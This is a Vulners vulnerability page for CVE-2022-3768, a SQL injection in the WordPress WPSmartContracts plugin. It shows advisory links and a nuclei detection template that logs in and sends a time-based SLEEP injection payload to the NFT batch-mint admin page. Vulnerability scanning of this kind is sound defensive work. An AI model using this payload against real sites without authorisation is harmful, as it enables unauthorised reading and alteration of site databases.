Lucene search
K

WordPress WPSmartContracts <1.3.12 - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WordPress WPSmartContracts <1.3.12 - SQL Injection. Vulnerability allows unauthorized SQL queries, data access, manipulation. Fixed in version 1.3.1

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-3768
28 Nov 202216:28
circl
CNNVD
WordPress plugin WPSmartContracts SQL注入漏洞
28 Nov 202200:00
cnnvd
CNVD
WordPress WPSmartContracts plugin SQL Injection Vulnerability
30 Nov 202200:00
cnvd
CVE
CVE-2022-3768
28 Nov 202213:47
cve
Cvelist
CVE-2022-3768 WPSmartContracts < 1.3.12 - Author+ SQLi
28 Nov 202213:47
cvelist
NVD
CVE-2022-3768
28 Nov 202214:15
nvd
OSV
CVE-2022-3768
28 Nov 202214:15
osv
Patchstack
WordPress WPSmartContracts plugin <= 1.3.11 - Auth. SQL Injection (SQLi) vulnerability
7 Nov 202200:00
patchstack
Prion
Sql injection
28 Nov 202214:15
prion
Positive Technologies
PT-2022-24039 · WordPress · Wpsmartcontracts
28 Nov 202200:00
ptsecurity
Rows per page
id: CVE-2022-3768

info:
  name: WordPress WPSmartContracts <1.3.12 - SQL Injection
  author: Hardik-Solanki
  severity: high
  description: |
    WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 1.3.12
  reference:
    - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
    - https://cve.report/CVE-2022-3768
    - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3768
    cwe-id: CWE-89
    epss-score: 0.03663
    epss-percentile: 0.88246
    cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpsmartcontracts
    product: wpsmartcontracts
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        @timeout: 15s
        GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "Batch Mint NFTs")'
        condition: and
# digest: 490a00463044022021edaf38116ee537847cd57d26e744082e3e33d129cb62ba60de15ad9c1daeee02200eab59593a510748144559b65ebf087ccd76a08b4f2f4182e2ae5ebf81eac4db:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.18.8
EPSS0.03663
SSVC
26